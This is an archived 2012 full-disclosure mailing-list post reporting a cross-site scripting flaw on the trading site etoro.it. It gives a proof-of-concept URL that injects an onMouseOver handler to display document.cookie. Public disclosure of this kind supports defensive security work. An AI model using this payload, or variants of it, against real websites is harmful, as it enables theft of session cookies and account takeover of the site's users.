[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] etoro.it vulnerable to XSS
From: tig3rhack () tormail ! org
Date: 2012-09-29 10:34:18
Message-ID: 1THuNG-0001Di-RD () internal ! tormail ! org
[Download RAW message or body]
The famous online trading website is vulnerable to an XSS attack
Poc:
http://www.etoro.it/educazione/node/1008/10%22%20onMouseOver=%22alert%28document.cookie%29%22
Info: https://tig3rblog.wordpress.com/2012/09/29/etoro-it-vulnerable-to-xss/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic